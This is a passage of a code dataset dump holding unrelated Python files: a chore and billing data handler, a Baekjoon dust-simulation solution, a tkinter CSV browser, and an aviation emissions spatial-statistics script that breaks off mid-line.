self.TempWeekAsignment[key][uuid]\n\n def TempEditChore(self, key, new_data):\n self.TempWeekAsignment[key][new_data['uuid']].update(new_data)\n\n def TempCheckChore(self, uuid, keys = ('normal', 'other')):\n for key in keys:\n for auuid in self.TempWeekAsignment[key]:\n if self.TempWeekAsignment[key][auuid]['choreuuid'] == uuid:\n return auuid\n return ''\n\n def TempRemoveCompleted(self):\n for key in self.TempWeekAsignment['normal']:\n if self.GetItemKey('chores', self.TempWeekAsignment['normal'][key]['choreuuid'], 'freq') > 1:\n self.TempWeekAsignment['normal'][key]['choreuuid'] = ''\n\n def TempAssignNewChores(self, cdate):\n assigned = [self.TempWeekAsignment[key1][key2]['choreuuid'] for key1 in self.TempWeekAsignment for key2 in self.TempWeekAsignment[key1] if self.TempWeekAsignment[key1][key2]['choreuuid'] != '']\n new_chores = [cid for cid in self.ConfigData['chores'] if self.GetWeekDifference(cdate, cid) >= self.GetItemKey('chores', cid, 'freq') and not cid in assigned]\n random.shuffle(new_chores)\n\n nassigned = 0\n for key in self.TempWeekAsignment:\n if len(new_chores) == nassigned: break\n for uuid in self.TempWeekAsignment[key]:\n if len(new_chores) == nassigned: break\n if self.TempWeekAsignment[key][uuid]['choreuuid'] == '':\n self.TempWeekAsignment[key][uuid]['choreuuid'] = new_chores[nassigned]\n nassigned += 1\n\n def SaveAssignment(self, cdate):\n cdatestr = '%d-W%d' % cdate.isocalendar()[:2]\n\n if cdatestr in self.AssignmentsData:\n self.AssignmentsData[cdatestr].update(self.TempWeekAsignment)\n else:\n self.AssignmentsData[cdatestr] = copy.deepcopy(self.TempWeekAsignment)\n\n for key in self.TempWeekAsignment:\n for uuid in self.TempWeekAsignment[key]:\n if self.TempWeekAsignment[key][uuid]['choreuuid'] == '': continue\n #if self.GetWeekDifference(cdate, self.TempWeekAsignment[key][uuid]['choreuuid']) > 0:\n self.EditItem('chores', self.TempWeekAsignment[key][uuid]['choreuuid'], {'alast' : '%d-W%d' % cdate.isocalendar()[:2]})\n\n self.UpdateAssignmentsFile()\n\n def LoadAssignment(self, cdate):\n cdatestr = '%d-W%d' % cdate.isocalendar()[:2]\n\n if cdatestr in self.AssignmentsData:\n del self.TempWeekAsignment\n self.TempWeekAsignment = copy.deepcopy(self.AssignmentsData[cdatestr])\n return True\n return False\n\n def LoadAsNewAssignment(self, cdate):\n cdatestr = '%d-W%d' % cdate.isocalendar()[:2]\n\n if cdatestr in self.AssignmentsData:\n self.TempClearChores()\n auuids = self.TempAddParticipants()\n\n for uuid in self.AssignmentsData[cdatestr]['normal']:\n self.TempWeekAsignment['normal'][auuids[self.AssignmentsData[cdatestr]['normal'][uuid]['personuuid']]]['choreuuid'] = self.AssignmentsData[cdatestr]['normal'][uuid]['choreuuid']\n self.TempWeekAsignment['normal'][auuids[self.AssignmentsData[cdatestr]['normal'][uuid]['personuuid']]]['home'] = self.GetItemKey('participants', self.AssignmentsData[cdatestr]['normal'][uuid]['personuuid'], 'athome')\n return True\n\n return False\n\n def TempSaveToTex(self, cdate, adict):\n try:\n tex_file = open(self.DateTexFile, 'w+')\n tex_file.write('Week \\\\textbf{%s} -- From \\\\textbf{%s} to \\\\textbf{%s}' % (cdate.isocalendar()[1], self.ComputeDateFromWeek(datetime.datetime.strftime(cdate, '%Y-W%W'), 1), self.ComputeDateFromWeek(datetime.datetime.strftime(cdate, '%Y-W%W'), 0)))\n tex_file.close()\n\n tex_file = open(self.DataTexFile, 'w+')\n tex_str = []\n\n for i, (uuid, name) in enumerate(self.SortedParticipantsList):\n tex_str.append('%s & %s & %s & \\phantom{---------------} & \\\\\\\\[0.25cm] \\\\hline' % ('Yes' if self.GetItemKey('participants', uuid, 'athome') else 'No', tex_escape(name), tex_escape(self.GetItemKey('chores', self.TempWeekAsignment['normal'][adict[i]['auuid']]['choreuuid'], 'name'))))\n\n for auuid in self.TempWeekAsignment['other']:\n tex_str.append('& (anyone) & %s & \\phantom{---------------} & \\\\\\\\[0.15cm] \\\\hline' % tex_escape(self.GetItemKey('chores', self.TempWeekAsignment['other'][auuid]['choreuuid'], 'name')))\n\n for i in range(max(0, 3-len(self.TempWeekAsignment['other']))):\n tex_str.append('& & & \\phantom{---------------} & \\\\\\\\[0.15cm] \\\\hline')\n\n tex_file.write('\\n'.join(tex_str))\n tex_file.close()\n except Exception as e:\n print('Error writing to data.tex: %s' % e)\n\n def BillingSaveToTex(self, gbuuid):\n try:\n tex_file = open(self.DateTexFile, 'w+')\n date_range = [datetime.date(*d) for d in self.BillingData['group_bills'][gbuuid]['date_range']]\n date_range_str = tuple([datetime.datetime.strftime(datetime.date(*d), '%Y-%m-%d') for d in self.BillingData['group_bills'][gbuuid]['date_range']])\n\n tex_file.write('Period: \\\\textbf{%s} --- \\\\textbf{%s}' % date_range_str)\n tex_file.close()\n\n except Exception as e:\n print('Error writing to %s: %s' % (self.DateTexFile, e))\n\n try:\n tex_file = open(self.DataTexFile, 'w+')\n tex_str = []\n\n sorted_bills = [(buuid, self.GetItemKey('participants', self.BillingData['bills'][buuid]['puuid'], 'name')) for buuid in self.BillingData['group_bills'][gbuuid]['buuids']]\n sorted_bills.sort(key=lambda e: e[1].lower())\n\n for i, (buuid, name) in enumerate(sorted_bills):\n contribution = self.BillingData['bills'][buuid]['bill_data']['contribution']\n psc = self.BillingData['bills'][buuid]['bill_data']['personal_shopping_costs']\n chores = self.BillingData['bills'][buuid]['bill_data']['chores']\n subtotal = self.BillingData['bills'][buuid]['bill_data']['subtotal']\n\n balance = self.ComputeCurrentBalance(self.BillingData['bills'][buuid]['puuid'])\n paid = sum([self.BillingData['payments'][tuuid]['amount'] for tuuid in self.BillingGetItemsInRange('payments', date_range[0], datetime.date.today()) if self.BillingData['payments'][tuuid]['puuid'] == self.BillingData['bills'][buuid]['puuid']])\n debt = balance - subtotal + paid\n\n tex_str.append('%s & %.2f & %.2f & %.2f & %.2f & %.2f & %.2f & \\\\emph{%.2f} \\\\\\\\ \\\\hline' % (tex_escape(name), contribution, psc, chores, subtotal, debt, paid, balance))\n\n tex_file.write('\\n'.join(tex_str))\n tex_file.close()\n\n except Exception as e:\n print('Error writing to %s: %s' % (self.DataTexFile, e))\n\n try:\n tex_file = open(self.BankTexFile, 'w+')\n\n rec = self.BillingData['group_bills'][gbuuid]['group_bill_data']['recurring']\n ssc = self.BillingData['group_bills'][gbuuid]['group_bill_data']['shared_shopping_costs']\n\n tex_str = '\\\\EUR{%.2f} & \\\\EUR{%.2f}' % (rec, ssc) + '& %s & %s & %s & %s \\\\\\\\ \\\\hline' % tuple([self.BillingData['config'][key] for key in self.BillingData['config'] if isinstance(self.BillingData['config'][key], str)])\n\n tex_file.write(tex_str)\n tex_file.close()\n\n except Exception as e:\n print('Error writing to %s: %s' % (self.BankTexFile, e))\n\n def UpdateConfigFile(self):\n try:\n config_file = open(self.ConfigFile, 'w+')\n json.dump(self.ConfigData, config_file)\n config_file.close()\n except Exception as e:\n print('Error saving configuration file: %s' % e)\n\n def UpdateAssignmentsFile(self):\n try:\n assignments_file = open(self.AssignmentsFile, 'w+')\n json.dump(self.AssignmentsData, assignments_file)\n assignments_file.close()\n except Exception as e:\n print('Error saving assignments file: %s' % e)\n\n def UpdateBillingFile(self):\n try:\n billing_file = open(self.BillingFile, 'w+')\n json.dump(self.BillingData, billing_file)\n billing_file.close()\n except Exception as e:\n print('Error saving assignments file: %s' % e)\n","sub_path":"datahandler/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":16099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"427223464","text":"#시뮬레이션 구현문제\n'''\n문제에 주어진 조건을 그대로 구현하는 문제다. 크게 두 단계로 나눠서 설계해야 한다. 첫 번째, 미세먼지가 확산되는 과정, 두 번째 공기청정기의 바람이 순환하는 과정이다.\n\n1. 모든 미세먼지는 5 이상의 양이 남아있으면, 상하좌우로 확산할 수 있다.\n확산할 때 상하좌우에 이미 먼지가 있는 경우가 있으므로, 별도의 배열을 만들어서 확산되는 먼지의 양을 저장해야 한다. 값을 바로 업데이트하면 다음 먼지 확산에 영향을 주기 때문에, 이 과정이 필요하다.\n현재 먼지의 양을 5로 나눈 후, 그 양을 상하좌우 칸에 더한다. 위에서 만든 별도의 배열 B에 더한다.\n모든 과정이 끝나면, 원래 먼지 배열 A에 확산 배열 B 값을 업데이트한다.\n\n2. 미세먼지가 바람 방향에 따라 순환한다.\n입력받을 때 공기청정기의 위치를 S1, S2에 저장한다.\n위쪽 공기청정기는 S1을 기준으로 반시계 방향으로 회전한다.\n아래쪽 공기청정기는 S2를 기준으로 시계 방향으로 회전한다.\n역순으로 회전하면서, 현재 값에 다음 값을 저장하면 된다.\n\n출처: https://rebas.kr/848 [PROJECT REBAS]\n'''\n\n\n#pypy로 통과 ,python3로 통과 못함. 변수명만 바꾸면 python에서도 통과하는데.. 왜 그런지 이해 못함\n\nr, c, t = map(int, input().split())\ndust = [list(map(int, input().split())) for _ in range(r)]\ncleaner1, cleaner2 = -1, 0\n\n\n\ndef diffuse(): #확산\n global dust\n tmp = [[0]*c for _ in range(r)]\n for x in range(r):\n for y in range(c):\n if dust[x][y] >= 5:\n diffusion = dust[x][y]//5\n for dx, dy in (-1,0), (1,0), (0,1), (0,-1):\n xNew, yNew = x + dx, y + dy\n if 0<=xNew<=r-1 and 0<=yNew<=c-1 and dust[xNew][yNew] != -1:\n tmp[xNew][yNew] += diffusion\n dust[x][y] -= diffusion\n for x in range(r):\n for y in range(c):\n dust[x][y] += tmp[x][y]\n\ndef purify():\n #위에서 아래 - 우에서 좌 - 아래에서 위 - 좌에서 우\n for x in range(cleaner1-2, -1, -1): #1번 청정기 위에서 아래\n dust[x+1][0] = dust[x][0]\n for y in range(c-1): #1번 우에서 좌\n dust[0][y] = dust[0][y+1]\n for x in range(cleaner1): #1번 아래에서 위\n dust[x][c-1] = dust[x+1][c-1]\n for y in range(c-2, -1, -1): #번 좌에서 우로 1칸씩 이동\n dust[cleaner1][y+1] = dust[cleaner1][y]\n dust[cleaner1][1] = 0\n for x in range(cleaner2+1, r-1):\n dust[x][0] = dust[x+1][0]\n for y in range(c-1):\n dust[r-1][y] = dust[r-1][y+1]\n for x in range(r-2, cleaner2-1, -1):\n dust[x+1][c-1] = dust[x][c-1]\n for y in range(c-2, -1, -1):\n dust[cleaner2][y+1] = dust[cleaner2][y]\n dust[cleaner2][1] = 0\n\ndef solve():\n for _ in range(t):\n diffuse()\n purify()\n print(sum(map(sum, dust))+2)\n\nfor x in range(r):\n for y in range(c):\n if dust[x][y] == -1:\n if cleaner1 == -1:\n cleaner1 = x\n else:\n cleaner2 = x\nsolve()\n\n\n","sub_path":"BeakjoonOJ_Solved/17144.py","file_name":"17144.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"375402701","text":"#!/usr/bin/python3.2\n\n\n\nimport tkinter, os\nfrom tkinter import *\n\nmain = tkinter.Tk()\n\n####################################################### parametre de la fenêtre\n\nmain.geometry(\"800x600+300+0\")\n\n####################################################### Menu barre \n\nmenubar = tkinter.Menu(main)\n\n#Quitte le programme\ndef quit():\n \n global main\n main.destroy()\n \n#Ouverture d'un fichier (non présent dans la liste)\ndef op():\n\n fenetre = Tk()\n filename = askopenfilename(title=\"Ouvrir vos mesures\",filetypes=[('CSV files','.csv')])\n fichier = open(filename, \"r\")\n fichier.close()\n\n Label(fenetre, text=content).pack(padx=10, pady=10)\n fenetre.mainloop()\n\n#Permet de sauvegarder les modifications\ndef sa():\n \n filname = asksaveasfile (title=\"Sauvegarder\", defaultextension='.csv')\n\n#Création d'un nouveau .csv\ndef ne():\n def newconf():\n file = open('entree'\".csv\", 'a')\n file.close() \n fenetre.quit\n \n fenetre=Tk()\n \n value = StringVar() \n value.set(\"Nouveau\"'.csv')\n entree = Entry(fenetre, width=30)\n entree.pack()\n \n annuler=Button(fenetre, text=\"Annuler\", command=fenetre.quit)\n annuler.pack(side=LEFT, padx=5, pady=5)\n annuler.pack()\n\n confirme=Button(fenetre, text=\"Confirmer\", command=newconf)\n confirme.pack(side=RIGHT, padx=5, pady=5)\n confirme.pack()\n\n fenetre.mainloop()\n \n \n #print(\"Nouvelles mesures\")\n\n# ajout des fonctions disponibles dans Fichier\nfilemenu = tkinter.Menu(menubar, bg='ghost white', tearoff=0)\nfilemenu.add_command(label=\"Open\", command=op) #Open\nfilemenu.add_command(label=\"Save\", command=sa) #Save\nfilemenu.add_command(label=\"New\", command=ne) #New\nfilemenu.add_separator() #Séparation\nfilemenu.add_command(label=\"Exit\", command=quit) #Exit\nmenubar.add_cascade(label=\"Fichier\", menu=filemenu) #Fichier\n\nmain.config(menu=menubar)\n\n\n################################################### Menu choix de fichier \n\nlistbox = tkinter.Listbox(main, bg='ghost white',height=750,width=595)\nlistbox.pack()\n\n#Titre de la liste\nlistbox.insert(tkinter.END, \"Mesures:\")\n\n#Repertoire\n#mesurefichier = os.listdir('U:\\\\Python\\\\SIN\\\\mesures')\nmesurefichier = os.listdir('G:\\\\Dev\\SIN\\\\SINproject\\\\mesures')\n\n#Filtre .csv + n'affiche que ce qu'il y a avant le .\nfor item in mesurefichier:\n if \".csv\" in item:\n listbox.insert(tkinter.END, item.split('.')[0])\n\n\n \n\n\n################################################### Fin Interface \n\nmain.mainloop()\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"447364434","text":"from collections import OrderedDict\nimport cartopy.io.shapereader as shpreader\nfrom shapely import geometry\nimport xarray as xr\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom descartes import PolygonPatch\nfrom pprint import PrettyPrinter\nfrom pyproj import Geod, Transformer\nimport json\n\n\"\"\"\nShows map with colour coding for different statistics relating to aircraft emissions and ground pollution due to\naircraft. The available statistics are:\n - BC emissions of aircraft summed over a specified altitude range\n - BC ground pollution due to aircraft summed over 21 days (January or July)\n - Ratio of BC ground pollution to BC emissions due to aviation\nIn order to obtain a single value for the country, several methods of combining the per-grid-cell data are supported:\n - Area average, which sums the data over the entire area of the country and then divides by its surface area\n - Median, which takes the median of all values in the country\nThe user can select between summer and winter using a boolean and define the altitude ranges over which emissions are\nconsidered (e.g. to separate cruise and LTO emissions). In addition to that, outlier countries can be specified to make\nlocal differences more visible. Countries who cause a division by zero during the calculation (e.g. if the emissions\nare zero in the ratio statistic) will automatically be removed. All removed countries are shown in black.\n\nIn addition to a map displaying the data per country, the program outputs three indicators of spatial auto correlation:\nGeary's C and global and local Moran's I. Global statistics are printed as a single value, while local statistics are\nshown in a map\n\n@author Jakob\n\"\"\"\n\n# TODO: Find neater solution for options\n# TODO: Add colour bar\n# Always keep in mind that the data for countries such as Russia and Algeria are only representative of the part of that\n# country which lies within the data region (and not of the entire country)\n# Also note that the pollution data is not influenced by areas outside of the data region (so the data does not show\n# pollution caused in Western Europe by cruise emissions in the US)\n# The numbers for emissions are often VERY small, in the order of 10^-14 to 10^-15. Be aware of machine precision\n# AvEmMasses.nc4 can also be used instead of AvEmFluxes.nc4, but it does not contain any information about differences\n# in altitudes. It merely contains the sum of all emissions over a certain grid cell\n\nsummer = False # used to select between pollution data for January and July\n\n# if set to False, the program looks for a file that already contains the pollution and emission data. If such a file\n# does not exist for the selected settings, it still recalculates the data\nrecalculate_data = False\n\n# the altitude levels over which emissions will be considered. Check Altitude_levels.txt for conversion to km\n# level 8: 1 km altitude, level 14: 2 km altitude\nemission_levels = slice(0, 8)\n\n# the value for these countries will be set to zero. That is useful if some countries have such high or low values that\n# they make it impossible to see any differences between the other countries\noutliers = [\"Iraq\", \"Israel\", \"Latvia\"]\n\n# available statistics for plotting\nPLOT_RATIO = \"Ground Pollution/Emission Ratio\"\nPLOT_EMISSIONS = \"Emissions\"\nPLOT_POLLUTION = \"Ground Pollution\"\n\nmode = PLOT_RATIO\n\n# supported ways of summarising data in a country\nMETHOD_AVG = \"Area average\"\nMETHOD_MEDIAN = \"Median\"\n\nmethod = METHOD_AVG\n\ncountry_file = json.load(open(\"countries.json\"))\n\n# data from 2016 for 1:20 million scale world map. More coarse or detailed maps are available. The coordinate\n# system is with longitude and latitude in degrees\nshape_file = 'Shapefiles/CNTR_RG_20M_2016_4326.shp'\n\n# NetCDF files containing pollution with aircraft on and off, respectively\npoll_on_filename = \"Soot.24h.{}.ON.nc4\".format(\"JUL\" if summer else \"JAN\")\npoll_off_filename = \"Soot.24h.{}.OFF.nc4\".format(\"JUL\" if summer else \"JAN\")\n\nem_filename = \"AvEmFluxes.nc4\" # NetCDF file containing aircraft emissions\nem_multiplier = 10E5 # factor to increase values of emission data and avoid rounding errors due to machine precision\n\ncolormap = \"coolwarm\" # colour map\nremoved_colour = (0, 0, 0, 1) # colour for removed countries\n\n\n# create a dictionary containing the polygons for all countries listed in \"interesting\". This function returns an\n# ordered dictionary with the format \"country_name: [[list of polygons that it is made up of], total area]\"\ndef create_country_polygons():\n frame = geometry.Polygon([(-30, 30), (50, 30), (50, 70), (-30, 70)]) # the geographic area for which we have data\n geod = Geod('+a=6378137 +f=0.0033528106647475126') # object used for conversion from degrees to km\n\n # read the shape file\n reader = shpreader.Reader(shape_file)\n\n # this is a generator, not a list. So you can only loop over it, not use indexing. But if necessary, it can be\n # converted using list( ).\n countries = reader.records()\n\n # the keys are country names (in English), and the value for each of them is a list with the polygons that the\n # country shape is made up of\n country_poly = {}\n\n # fill the country_poly\n for country in countries:\n # the .split( ) part in this statement is necessary because for some reason the names have \\x00\\x00\\x00... added\n # to them. If you don't remove that, the statement doesn't find any of them in the \"interesting\" list\n country_name = country.attributes['NAME_ENGL'].split(\"\\x00\")[0]\n if country_name in country_file:\n # create empty list which will be filled with the polygons of the country, and set total area to 0\n country_poly[country_name] = [[], 0]\n multipolygon = country.geometry.geoms # a multipolygon can consist of several disjoint polygons\n for polygon in multipolygon: # each of these is a shapely polygon\n # get the portion of the polygon that's inside the data frame. This may result in shapely polygons or\n # multipolygons being created (e.g. if the original polygon is split in half)\n inside_frame = polygon.intersection(frame)\n\n # function used to add a polygon to the dictionary\n def add_region(region):\n country_poly[country_name][0].append(region)\n # add the area of the country which lies inside of the frame (in km^2)\n country_poly[country_name][1] += abs(geod.geometry_area_perimeter(region)[0] / 1E6)\n\n if isinstance(inside_frame, geometry.Polygon):\n add_region(inside_frame)\n\n elif isinstance(inside_frame, geometry.MultiPolygon):\n for region in inside_frame: # loop over all the polygons that make up the multipolygon\n add_region(region)\n\n # eliminate any countries that don't have any polygons inside of the data frame\n if not country_poly[country_name][0]:\n del country_poly[country_name]\n\n # return an ordered dictionary (countries in alphabetical order)\n return OrderedDict(sorted(country_poly.items(), key=lambda t: t[0]))\n\n\n# find the name of the country in which the coordinates (lon, lat) lie. Return None if it does not lie inside any\n# of the countries listed in \"countries\". \"countries\" has the same format as the return value of\n# create_country_polygons(), i.e. a dictionary with country names as keys and lists of polygons as values\ndef find_country_name(country_polygons, lon, lat):\n for name in country_polygons: # loop over all countries\n for region in country_polygons[name][0]: # loop over each polygon that the country is made of\n if region.contains(geometry.Point(lon, lat)): # check if the polygon contains the coordinates\n return name\n return None\n\n\n# find the ground level pollution (BC due to aircraft) and aircraft BC emission data for each country, and return it\n# in an ordered dictionary in the form \"country_name: [emission, pollution]\".\ndef find_poll_em_data(country_polygons):\n if not recalculate_data:\n try: # try and find a buffer file for the given settings\n poll_em_data = json.load(open(\"poll_em_buffer.json\"))\n\n # retrieve the relevant parameters that were used to generate the buffer file\n summer_saved = poll_em_data[\"summer\"]\n emission_levels_saved = poll_em_data[\"emission_levels\"]\n\n # if time of year and altitude ranges match\n if summer_saved == summer and emission_levels_saved[0] == emission_levels.start and \\\n emission_levels_saved[1] == emission_levels.stop:\n\n # remove the items that stored parameters, since they are not needed anymore\n del poll_em_data[\"summer\"]\n del poll_em_data[\"emission_levels\"]\n\n # check for any missing countries in the file\n requested_keys = set(country_polygons.keys())\n returned_keys = set(poll_em_data.keys())\n unavailable = list(requested_keys.difference(returned_keys))\n\n print(\"Retrieved data from existing file\")\n\n # return data, along with the names of all missing countries\n return OrderedDict(sorted(poll_em_data.items(), key=lambda t: t[0])), unavailable # continue here\n\n else: # if the settings in the buffer file don't match the required settings\n print(\"Parameters in buffer file don't match user input. Recalculating data...\")\n\n except (FileNotFoundError, KeyError): # in case there is no buffer file\n print(\"No valid file found, recalculating data...\")\n\n # anything from here onwards is only executed in case the data needs to be recalculated\n\n DS = xr.open_dataset(em_filename)\n da_em = DS.BC * em_multiplier # select only the BC (black carbon) emissions since it is inert\n\n DS_on = xr.open_dataset(poll_on_filename)\n DS_off = xr.open_dataset(poll_off_filename)\n\n # subtract pollution data without aircraft from pollution with aircraft to retrieve the pollution caused by\n # aircraft only. Also, only select BC\n da_poll = DS_on.AerMassBC - DS_off.AerMassBC\n\n poll_em_data = {}\n lon_axis = da_em.coords['lon'].values # the longitude values of the data grid\n lat_axis = da_em.coords['lat'].values # the latitude values of the data grid\n\n # this block fills poll_em_data in the format \"country_name: [total_emissions, time_averaged_pollution]\"\n for lon in lon_axis:\n for lat in lat_axis: # loop over all cells in the data grid\n country = find_country_name(country_polygons, lon, lat) # find the country the cell lies in\n if country is not None:\n if country not in poll_em_data:\n # if this is the first time the country is detected, set emission and pollution counters to 0\n poll_em_data[country] = [[], []]\n # select the correct values from the simulation data and add it to the lists. Sum over all parameters\n # which are not explicitly specified (e.g. time or altitude)\n poll_em_data[country][0].append(float(np.sum(da_em.sel(lon=lon, lat=lat)\n .sel(lev=emission_levels).values))) # select altitude range\n poll_em_data[country][1].append(float(np.sum(da_poll.sel(lon=lon, lat=lat)\n .sel(lev=1, method='nearest').values)))\n\n # write the data into a buffer file, to speed up loading next time the program is run\n with open(\"poll_em_buffer.json\", \"w\") as outfile:\n data_saved = poll_em_data.copy() # make a copy so that the original remains unchanged\n\n # add items describing the settings used to generate the data\n data_saved[\"summer\"] = summer\n data_saved[\"emission_levels\"] = [emission_levels.start, emission_levels.stop]\n\n # write the file\n json.dump(data_saved, outfile, indent=4)\n\n # check for any missing countries in the file\n requested_keys = set(country_polygons.keys())\n returned_keys = set(poll_em_data.keys())\n unavailable = list(requested_keys.difference(returned_keys))\n\n # return data, along with the names of all missing countries\n return OrderedDict(sorted(poll_em_data.items(), key=lambda t: t[0])), unavailable\n\n\n# integrate the data over the country surfaces using the chosen method, and combine emission and pollution data\n# according to the selected mode. Returns an ordered dict with \"country_name: value\". Also returns any countries that\n# were removed\ndef process_data(country_polygons, raw_data):\n processed_data = raw_data.copy() # make a copy of the data to not modify the original\n\n # summarise list of data for each country in one single value, using the selected method\n if method == METHOD_AVG:\n for country in raw_data:\n processed_data[country] = np.sum(raw_data[country], axis=1)\n elif method == METHOD_MEDIAN:\n for country in raw_data:\n processed_data[country] = np.median(raw_data[country], axis=1)\n else:\n print(\"Error: Invalid averaging method:\", method)\n\n # list of all countries that were removed, either if they lead to divisions by zero or because they were labelled\n # as outliers. This list does not contain the countries for which we do not have any data at all\n removed_countries = []\n\n # post-process the data according to the selected statistic to get the format \"country_name: value\"\n if mode == PLOT_RATIO:\n for country in raw_data:\n # avoid division by zero and check that the country isn't labeled as an outlier\n if processed_data[country][0] != 0 and not any([outlier in country for outlier in outliers]):\n # divide pollution by emissions\n processed_data[country] = processed_data[country][1] / processed_data[country][0]\n else: # remove the country from the data set if it is an outlier or if it has no emissions\n removed_countries.append(country)\n del processed_data[country]\n elif mode == PLOT_EMISSIONS or mode == PLOT_POLLUTION:\n for country in raw_data:\n if not any([outlier in country for outlier in outliers]):\n # divide pollution or emissions (depending on the mode) by the area of the corresponding country\n processed_data[country] = processed_data[country][0 if mode == PLOT_EMISSIONS else 1] / \\\n country_polygons[country][1]\n else: # remove the country from the data set if it is an outlier\n removed_countries.append(country)\n del processed_data[country]\n else:\n print(\"Error: Invalid mode:\", mode)\n\n return OrderedDict(sorted(processed_data.items(), key=lambda t: t[0])), removed_countries\n\n\n# returns a matrix that gives the spatial correlation between countries (based on the inverse of the distance between\n# them). Used for spatial autocorrelation measurement\ndef spatial_matrix(country_polygons):\n transformer = Transformer.from_crs(\"EPSG:4326\", \"EPSG:3035\") # used to transform longitude and latitude to metres\n centres = [] # list for the centres of all countries\n for country in country_polygons:\n # the centre of the country is the weighted average of the centres of its sub-regions\n centre_lon_lat = sum([np.array(region.centroid) * region.area for region in country_polygons[country][0]]) / \\\n sum([region.area for region in country_polygons[country][0]])\n centres.append(transformer.transform(centre_lon_lat[0], centre_lon_lat[1])) # transform centre to metres\n\n centres = np.array(centres) / 1E3 # convert centre coordinates from metres to kilometres\n polygon_values = list(country_polygons.values()) # values of the polygon list (used to get area of the country)\n w = np.zeros((len(country_polygons), len(country_polygons))) # empty matrix for weights\n # loop over all rows of the matrix, each corresponding to a country\n for i in range(len(w)):\n # characteristic radius of the country (radius of a circle with the same area)\n char_rad = np.sqrt(polygon_values[i][1] / np.pi)\n\n distances = np.linalg.norm(centres[i] - centres, axis=1) # distances from this country to all others\n distances[i] = 1 # avoid division by zero (distance from the country to itself is 0)\n\n # weight of each country is the inverse of its distance, multiplied by the current country's characteristic\n # radius This scaling is done because the influence of a big country at its borders is just as big as the\n # influence of a small country at its borders. If we didn't use this factor, the weight of the neighbouring\n # countries of a big country would be smaller, since they are further away from its centre.\n w[i] = 1 / distances * char_rad\n\n w[i, i] = 0 # set the weight of the current country w.r.t itself to 0\n\n return w\n\n\n# return the global Moran's I for the data set. A positive value indicates that values are clustered, i.e. similar\n# values are close to each other on the map (positive spatial auto correlation). A negative value means that similar\n# values are far apart, and zero means that values are randomly distributed (negative spatial auto correlation)\ndef morans_i_global(country_polygons, data):\n w = spatial_matrix(country_polygons)\n\n data_values = list(data.values())\n mean = np.mean(data_values)\n s = 0\n for i in range(len(w)):\n for j in range(len(w[i])):\n s += w[i, j] * (data_values[i] - mean) * (data_values[j] - mean)\n\n return len(data_values) / np.sum(w) * s / np.var(data_values)\n\n\n# return the Geary's C for the data set. A value between 0 and 1 indicates positive spatial auto correlation,\n# a value larger than 1 shows negative spatial auto correlation. More sensitive to local scales than Moran's I\ndef gearys_c(country_polygons, data):\n w = spatial_matrix(country_polygons)\n\n data_values = list(data.values())\n s = 0\n for i in range(len(w)):\n for j in range(len(w[i])):\n s += w[i, j] * (data_values[i] - data_values[j]) ** 2\n\n return (len(data_values) - 1) * s / (2 * np.sum(w) * np.var(data_values))\n\n\n# return the local Moran's I for each country in the data set. A positive value indicates that the country's value is\n# similar to its neighbours, while a negative value shows that it is an outlier compared to its surroundings.\ndef morans_i_local(country_polygons, data):\n w = spatial_matrix(country_polygons)\n data_values = list(data.values())\n mean = np.mean(data_values)\n i_local = []\n for i in range(len(w)):\n var = np.mean(np.delete(data_values, i))\n s = 0\n for j in range(len(w[i])):\n s += w[i, j] * (data_values[j] - mean)\n i_local.append((len(w) - 1) / var * (data_values[i] - mean) * s / np.sum(w[i]))\n\n country_names = list(country_polygons.keys())\n return OrderedDict({country_names[i]: i_local[i] for i in range(len(w))})\n\n\n# functions to map the values for each country between 0 and 1\ndef lin_mapping(val, min_val, max_val):\n return (val - min_val) / (max_val - min_val)\n\n\ndef sqrt_mapping(val, min_val, max_val):\n return np.sqrt((val - min_val) / (max_val - min_val))\n\n\ndef log_mapping(val, min_val, max_val):\n return np.log((val - min_val) / (max_val - min_val) + 1) / np.log(2)\n\n\n# show map with colour coding for the pollution and/or emission data\ndef plot(country_polygons, processed_data, add_title=\"\", add_info=\"\", show_removed=False, mapping=lin_mapping):\n ax = plt.gca() # get the axes of the current figure\n ax.set_title(mode + add_title + \"\\n\\nConsidered chemical: BC | Time frame for pollution: \" +\n (\"July\" if summer else \"January\") + \" 2005 | Altitude levels for emission: \" +\n str(emission_levels.start) + \" to \" + str(emission_levels.stop) + \" | Averaging method: \" + method)\n\n countries_with_poly = set(country_polygons.keys())\n countries_with_data = set(processed_data.keys())\n removed_countries = list(countries_with_poly.difference(countries_with_data))\n if show_removed:\n ax.set_xlabel(\"Removed countries: \" + str(removed_countries) + \"\\n\" + add_info)\n else:\n ax.set_xlabel(add_info)\n\n # only display the region for which we have data\n ax.set_xlim([-30, 50])\n ax.set_ylim([30, 70])\n\n # find maximum and minimum value to scale the colour coding\n min_val = min(processed_data.values())\n max_val = max(processed_data.values())\n\n # loop over all countries for which we have found a pollution and emission data. These are not necessarily the\n # same countries as the ones in the polygon dictionary, since some countries (e.g. Vatican City) are too small\n # to contain any data (the grid is too coarse). These countries will then not be plotted\n for name in processed_data:\n value = processed_data[name] # retrieve the value for this country\n\n # select the colour based on the value. Nonlinear mappings can be used to make differences more apparent\n colour = plt.get_cmap(colormap)(mapping(value, min_val, max_val))\n for region in country_polygons[name][0]: # loop over all regions that the country consists of\n ax.plot(*region.exterior.xy, alpha=0) # plot the borders of the polygon\n ax.add_patch(PolygonPatch(region, facecolor=colour)) # fill the polygon with colour\n\n for name in removed_countries:\n for region in country_polygons[name][0]: # loop over all regions that the country consists of\n ax.plot(*region.exterior.xy, alpha=0) # plot the borders of the polygon\n ax.add_patch(PolygonPatch(region, facecolor=removed_colour)) # fill the polygon with colour\n\n # TODO: Add colour bar\n # gradient = mapping(np.linspace(min_val, max_val, 256), min_val, max_val)\n # gradient = np.vstack((gradient, gradient))\n # ax.imshow(gradient, aspect='auto', cmap=plt.get_cmap(colormap))\n\n\nprint(\"Creating country polygons...\")\ncountries = create_country_polygons()\ncountries_with_data = countries.copy() # the countries which can be used for analysis later on\n\nprint(\"Retrieving raw pollution and emission data...\")\nraw_data, unavailable = 